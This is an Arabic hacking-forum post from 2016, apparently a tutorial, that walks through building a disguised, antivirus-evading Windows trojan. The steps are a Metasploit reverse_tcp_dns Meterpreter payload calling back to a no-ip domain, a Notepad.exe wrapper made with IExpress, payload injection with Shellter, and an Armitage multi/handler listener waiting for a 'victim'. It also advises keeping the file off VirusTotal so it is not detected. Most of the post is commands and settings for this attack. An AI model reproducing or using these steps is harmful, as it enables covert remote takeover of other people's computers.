التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > Penteration Testing Training

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-25-2016, 07:01 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية T!F!Nar
 

 

 
إحصائية العضو








T!F!Nar غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
T!F!Nar is on a distinguished road

.... تجاوز قيود الرفع و اختراق السيرفر حصريا


السلام عليكم.
في هذا الشرح سنقوم بانشاء طورجان متربريتر مشفر باستعمال اسم دومين. المرحلة الأولى حول طريقة انشاء سيرفر dns (انا استعمل نو اي بي no-ip) .

و المرحلة الثانية حول انشاء ملف تنفيدي و ثالثا استخدام كلا الملفين (الملف التنفيدي ويندوز + السيرفر ) و اخيرا التصنت باستعمال الارميتاج على سيرفر و بورت الاختراق.
الشرح بسيط ان شاء الله كلشي يستفيد
الأدوات التي تحتاج اليها:
  1. كالي لينكس https://www.kali.org/
  1. ويندوز
  1. حساب نو ايبي مربوط بدومين http://www.noip.com/
  1. بورت الاخراق مفتوح في الراوتر
  1. برنامج شيلتر https://www.shellterproject.com/download/


الجزء الأول :انشاء سيرفر دي ان اس باستعمال الكالي

افتح برنامج الميتاسبولت في شاشة الأوامر باستعمال الأمر
كود:
msfconsole
نختار السيرفر التالي بالامر
كود:
use payload/windows/meterpreter/reverse_tcp_dns
نأمر الميتا لاظهار خصائص السيرفر
كود:
show options
يجب ان تضع
lhost = الهوست الذي تم انشاءه مع النو اي بي بدون البرتكول http://
lport = رقم البورت الذي فتحته في الراتور
ثم نضع الأمر التالي لاظهار خصائص انشاء السيرفر
كود:
generate -h
ثم الأمر التالي لانشاء السيرفر
كود:
generate -f DNS -p windows -t raw
مع DNS= اسم السيرفر الذي تريد
الأن نغلق شاشة الأوامر و نفتح مدير الملفات سنجد السرفر الذي تم انشاءه في home folder


الجزء الثاني: انشاء الملف التنفيذي في وندوز


اختر الخاصية التي تناسبك (مع العلم أن برنامج شيلتر ليس متوافق مع برامج 64 بايت) ه
لأصحاب 32 بايت نذهب الى
كود:
C:\Windows\System32\iexpress.exe و كليك يمين و نشغله كمدير  run as administrator
لمن لديه بلاتفورم 64 بايت ننتقل الى
كود:
C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)
نختار
Create new Self Extraction Directive File ثم next. ثمnext on the Package Purpose page
نضع أي شيء في عنوان الباكتاج مثل
Ex: Notepad.exe
No Prompt, اضغط next
Do not display a license, اضغط next
اغضط add و اختر اي برنامج في النظام أنا مثلا اخترت Notepad.exe في C:\Windows\System32. اضغط next .
اضغط drop arrow و اختر اسم مثل الذي اخترت في الأول
نغضط على التصفح browse و نكتب اسم البرنامج و مساره مع تفعيل خاصية Hide File Extracting Progress Animation from user. Click Next.
اختر No restart و اضغط next --> next --> next الى انشاء الملف ثم انهاء Finish. .

الجزء الثالث: استخدام كلا الملفين لانشاء الطورجان الخاص بنا


افتح مجلد شيلتر و افتح البرنامج كمدير
+ ضع A لـ Auto.
+ ضع N لـ No.
اختر مسار البرنامج الذي قمنا بانشاءه في الجزء الثاني و أترك البرنامج ليقوم بشغله أقل من دقيقة، و عندما يطلب مسار السيرفر ضع مكان السيرفر من الجزء 1 بعد نسخه للجهاز طبعا
+ ضع C لـ custom.
+ ضع مسار السيرفر.
+ ضع N لـ No reflective DLL loader.
اضغط enter وضع البرنامج يعمل عندما نحصل على رسالة Injection Verified سيكون لديك طورجان مشفر مبروك


الجزء الرابع : التصنت على الأرميتاج

تستطيع استعمال ارميتاج او كوبالت سترايك أو حتى الميتا حسب الرغبة أنا أستعمل ارميتاج
نعود لنظام الكالي
نفتح شاشة الأوامر و نكتب
كود:
msfupdate
للتحديث
و اتبع التالي

كود:
apt-get install armitage
كود:
msfdb init
كود:
Armitage
اضغط Connect
اضغط Yes
عندما تفتح معنا شاشة الارميتاج أو الميتا نكتب التالي
كود:
use exploit/multi/handler
كود:
set lhost 0.0.0.0
مع lhost عنوان الايبي الخارجي
كود:
set lport 4444
مع lport رقم البورت الدي اخترناه للسيرفر
كود:
set payload windows/meterpreter/reverse tcp dns
كود:
set exitonsession false
ان اردت اضافة الأمر
كود:
set autorunscript migrate -f
و
كود:
set prependmigrate True
أخيرا
كود:
exploit -j
بعد ارسال الطرورجان و تشغيله من طرف الضحية مبروك عليكم
ملاحظة:
لا ترفع الطرورجان على مواقع الفحص التي ترسل القيم مثل فايروس تاوتال
- سيرفر زعما payload
- موضوع ليس منقول بل مخدوم
شكرا على المتابعة، اي استفسار تفضلوا



j[h,. rd,] hgvtu , hojvhr hgsdvtv pwvdh

التوقيع

Love
Peace

Weed

 


التعديل الأخير تم بواسطة mimo-dz ; 09-27-2016 الساعة 01:56 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 02:19 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0